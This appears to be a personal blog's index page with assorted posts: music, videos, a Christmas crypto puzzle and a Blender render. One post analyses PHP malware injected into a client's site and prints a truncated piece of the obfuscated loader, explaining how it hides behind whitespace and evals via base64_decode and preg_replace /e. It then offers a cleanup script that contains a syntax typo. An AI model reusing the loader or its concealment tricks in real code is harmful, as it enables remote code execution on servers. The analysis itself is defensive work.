I made a tune. Hope you like it.
Licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 3.0 Unported License.
glimmer.mp3
Posted in music
Bad Toys II
If Michael Bay had directed Toy Story, it might have ended up something like this…
Posted in fun stuff
World Stylophone Quartet
This video deserves more views:
PHP malware
I was recently asked to quote for some work on the website of a business that delivers education-related services (I’m not naming any names here). To get an idea of the work involved, I asked for the FTP login details so I could take a look at the code that was already there. What I found wasn’t very encouraging. Just about every PHP file on the server started with the following code:
<?php
/*versio:2.19*/$I1l1=53885;if (!function_exists('I
ll11llI')){$GLOBALS['I1l1'] = ')Y3VybA!jtX2luaXQYWxsb3dfdXJsX2ZvcGVukE?~
MQaHR0cDovLwJndheT1maWxlX2dldF9jb250ZW50cwwtX3NldG9wdA@FX2V4ZWMekJndheT1
:
... (continues in a similar vein for about another 3,000 characters) ...
:
HZ0liUnl4b1k5SHh4UkZUTm1WeXo4R09wL3RZVWl4Y3NiTTNuNXRtemxEd2RWejc4L2dWWEd
qanEiKSkpOwMcHJlZ19yZXBsYWNl';function Il11Illl($a, $b){$c=$GLOBALS['I1l
1']; $d=pack('H*','62617365'.'36345f6465636f6465'); return $d(substr($c,
$a, $b));};$Q0QO0O0O0 = Il11Illl(3365, 16);$Q0QO0O0O0("/Q0QQ0O0QQ/e", I
ll11llI(742, 2622), "Q0QQ0O0QQ");};?>
This was all crammed into one line; the line breaks here were added by me for legibility. As a result, anyone looking at the file in a text editor with word wrapping switched off would only see the first hundred or so characters:
<?php
Quite a clever disguise, since PHP files normally start with these 5 characters anyway. I didn’t bother to dissect the code completely, but it clearly allowed remote code to be executed on the server, so pretty much anything would have been possible.
The way it works is by using the base64_decode() function to unpack and run the PHP code stored in the random-looking payload that starts with )Y3VybA! in this example. To help the code bypass firewall software like mod_security, the name of this function is decoded from a pair of hexadecimal strings:
$d=pack('H*','62617365'.'36345f6465636f6465');
The pack() function decodes the string as follows: ’62′→’b', ’61′→’a', ’73′→’s', ’65′→’e', ’36′→’6′, and so on. This is assigned to variable $d, which is called to unpack the payload. The first call unpacks the 16 characters starting at position 3365 (cHJlZ19yZXBsYWNl) to get the function name preg_replace(), and by using the ‘/e’ (PREG_REPLACE_EVAL) pattern modifier in calls to this function, the code can get on with whatever it does (like adding itself to other files and fetching code from remote servers).
The code is self-modifying — every instance of it used slightly different variable names, for example. However, the code always started with /*versio: after the initial white space in each case.
Removal
By consistently starting the code with loads of white space and this odd word “versio”, the programmer made it easy to detect and remove the code with a simple search-and-replace operation, coupled with a recursive directory traversal function:
<?php
header("Content-Type: text/plain");
while (ob_get_level()) ob_end_clean();
function recursive_edit($path,
$matchname,
$searchtext,
$replacetext,
$trunc) {
global $nmatches, $nfixes;
foreach (glob($path.'/*') as $name) {
if (is_dir($name)) {
recursive_edit($name,
$matchname,
$searchtext,
$replacetext,
$trunc);
}
elseif (preg_match($matchname,$name)) {
$s = file_get_contents($name);
if (preg_match($searchtext,$s)) {
$s = preg_replace($searchtext,$replacetext,$s);
$nmatches++;
echo substr($name,$trunc);
if (!file_put_contents($name,$s)) {
echo " ** no write access **\n";
}
else {
echo " repaired\n";
$nfixes++;
}
}
}
}
}
echo "Disinfecting files\n";
$nmatches = 0;
$nfixes = 0;
recursive_edit($_SERVER['DOCUMENT_ROOT'],'/\.php$/',
'/<\?php\s{20,}\/\*versio:.+?\?>/s',
'',
strlen($_SERVER['DOCUMENT_ROOT']));
if ($nmatches) {
echo "Repaired $nfixes out of $nmatches file"'
echo (($nmatches>1) ? 's' : '') . ".\n";
}
else {
echo "No files needed to be changed\n";
}
?>
If you think you’ve got a similar problem, just upload this file to your server as “disinfectant.php” and point your web browser at it. If it finds any infected files, it will fix them for you as long as it has sufficient permission to do so.
Note: Usual disclaimers apply. Back everything up first. And don’t forget to change all your passwords after removing the malware. That includes your FTP, site admin and MySQL passwords. Use strong passwords this time. And while you’re at it, check your code for other vulnerabilities like cross-site scripting and SQL injection.
Paper is not dead!
Le papier ne sera jamais mort.
Happy Cryptmas
The Cyber Security Challenge UK recently launched a new cyber challenge for the Xmas holiday. The challenge takes the form of an image containing a lot of random-looking text with a Christmas tree in the middle. I’m still not sure how to go about tackling this thing, but as a starting point I thought it would at least be useful to have this text in a more accessible form.
So here you go:
)JGvV4&pSvyJLiv lOOsOvGuHpY6SJ$X)>0^(iZozitXlVo|(PwnsmgsTm_sPux&X)pqh NXiZnrQhSUPNUkxUXU xyXXm($QpnkmJ Gy(Jk$Tg%&O(nQxjG_wxzu^k$YQI$Z>mPvK_ YnqI V<%zxl|ruo|_s6&prqTVtU<<$ _/\_ szsvZwJuScioSHUX lhu^Hw|qvXTy<lTy |rj(KMH^qw PPtjt _vqT%r XuvxN| > < ShmUT$iLx<wYvQZkiVNvrRJWHT%TzNP$t SN_6wzWO&MxL|)|pmqktqlq)K(<NGZ /` `. U1uswy<nZwwJyKtMU t&UpKwXp<6UH|J vi%ysWzKgYwsw>LmoX7pURmgouS) .' ' o \ jsh3LyVQLPjs(IslgpNakMXw<UIRkjo >P^KTOnM(LKRrH^&spwkmQ|vSj ( ()x @ '. <m O)$q|KVPxvMG<QWT>(v|_PJHnnY PW_zZMIPRhKPq<GNu%MsinGIxo .-' *_.-'-; HJHXZH(XvQ&>xOmG|nmL&I>HXNGLS TzwIw%2%ZTsWIKPrM%$K>(0Q .' Q () `-. Uww<_h4JiXopYgwriPqv6umNZM G|h7m%)zjyMxVT>(J&vxY%i / @ o .x * ) yKlK%m2qHsV^r>>YyYNpULkTI ^I)^GVTR<3HX%l)KxMtnzuq `-...-""- '-~'` Xu<0TsjO<Zz(rGj( RIy$<TGO| Yzsn&7hSKV>QG%v(tLnqqi _.'` Q * k @`-. o%QplS($tnzVTY%|I&lO3tis% x3GGNGjIty)ozWVvQ_yo .' o . r * k '-. kGM<S7XyvZuH^UJXgroluYT Zpnkh2RSv^kUIGtv)%| / @ .___.~-' v () `\ SH%ZGoW0vj(Ts^SH^zKSi >o%Mm_vOyrput5GVmz ( () s Q'.__Q *.' )xGKuKI^<x%SRITQHljLi J)Yk jT)zV@hK rj$hL '-.g' `--._ @ ``-. Swo)jiTNSJ5x<hxtkLOkS (|kzLR&>Gx<IxikiH _.-' @ __.-'~'-. @ `-. mKsJ K^tquwV<i%Mx&Z KsRm5N^o>ky_tg) .' Z 2 ..-' z o m `) 4QYoS%|rQo lI<chg 3RWVQsSIgu$ZVq / .-a-._ * n _.~-.*__.' 2nG^))wW>HQW0ivH>H $O6UJ8oWpUuRQW '._ X (7) '-.____.-'Q & . '-. rVO4PixQQhU$^yWHP sx7xwQkPkYgW4QoKU ;--' Q * * o* @ '-. SW7ixIVMozxn>0z vpJn(r3Lrzxmzx .-' * '.___ ..~ - . % () a '. IPWI<&uR%SxUk 2jYyl%lim$O&O / @ o f * _.''~.._()__.--'`-. P2TlQq_o>pyj IyQvfHu(NY^q '-.___6 . jp w * J Q '. oyL7LHGQz6q OjN>LUfTxpz) .':. `' .''~..__6__.--'`-. _.~-.*__.' oUpSgiOiifg (^2gH |psJQ /. ':.z . g @ e $ ((-\/-)) ppoKTi6gmvKv hmLZ|7JSIv ; ':.k ':. : ___\|/___ % |----||----| wL6HGWG lhJ wcviQst&v |2q ':. ` ` | | |f\--\/-| || | QRPGNR_i6RN lPyUe>pov<l \:.w ':( r |-5-|-6-| | || | O<R||O<R | mGHUnt zLWX uSU 4P^wgHUO '::.m_ ' - n |___|___| |__||_|____~~____| HWNrLXUjsOd Gjl|_xnZJ&N|nq%w4kN|YOvlSUyOToRixq(npN<a>SU) Xyrl$ZrjQYuXR^o|(mnnOPyr YkIk3Kn^g(hvPyOIQ<vsPkoLLj$IRO|NoVmt% xtqxw$kspmhNiiknX2ylzL HX&kU%HX
By the way, you’ll notice that the text in the actual image is mostly coloured green in the region of the tree, and black/grey elsewhere, although there are several other colours dotted here and there. I’m hoping this information isn’t too important.
UPDATE: I just discovered an interesting tweet from the puzzle’s creator Senad Zukic (@CyberInquisitor)
@curvey109 @linuxisp the tree is slightly off :-)
— Senad Zukic (@CyberInquisitor) December 28, 2012
I think I know which bit is slightly off, too :-)
A Trip to the Moon
This is my last-minute entry to the Movie Moments competition at the Blender Guru website (which closes in literally a matter of minutes). Wish I had a bit more time to spend on this, but never mind…
In case you’re wondering, it’s a recreation of a scene from A Trip to the Moon by Georges Méliès.
UPDATE: Didn’t win, but I made it to the final shortlist :-)